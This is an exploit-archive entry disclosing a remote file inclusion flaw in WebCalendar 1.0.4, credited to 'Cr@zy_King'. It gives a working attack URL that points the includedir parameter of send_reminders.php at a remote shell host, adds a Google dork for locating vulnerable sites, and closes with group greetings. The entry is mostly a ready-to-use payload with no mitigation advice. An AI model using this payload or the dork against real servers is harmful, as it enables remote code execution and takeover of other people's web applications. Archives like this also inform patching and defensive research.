id: 3209
date: 06/16/2008
title: WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability
author: Cr@zy_King
cves: 

==================================================================
WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability
==================================================================



WebCalendar v1.0.4 Remote F?le Include

Demo - Down : http://webcalendar.sourceforge.net/

http://localhost/patch/tools/send_reminders.php?noSet=0&includedir=http://sheLLz?

Google Dork : "WebCalendar v1.0.4"


Greatz : aLL My Friend'Z & nETKILLER



#  0day.today [2023-03-24]  #